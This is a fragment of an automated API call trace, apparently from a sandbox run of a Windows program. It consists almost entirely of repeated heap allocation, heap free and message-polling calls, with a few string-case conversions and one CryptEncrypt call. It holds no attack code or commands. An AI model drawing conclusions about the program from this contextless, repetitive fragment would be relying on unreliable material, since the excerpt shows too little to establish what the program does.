dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.084] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.084] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.084] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.085] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.085] CharLowerBuffW (in: lpsz="byte[16344]", cchLength=0xb | out: lpsz="byte[16344]") returned 0xb [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.086] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.086] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.087] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.087] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.087] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.087] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.087] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.088] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34ca218*, pdwDataLen=0x8bef68*=0x3fd3, dwBufLen=0x3fd8 | out: pbData=0x34ca218*, pdwDataLen=0x8bef68*=0x3fd8) returned 1 [0252.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0252.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0252.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.089] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.089] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.089] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.091] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.091] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.092] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.092] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.092] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.092] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.092] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.092] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.093] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.093] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.093] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.093] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.093] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.093] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.094] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.094] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.094] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0252.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.094] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.095] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.095] RtlAllocateHeap 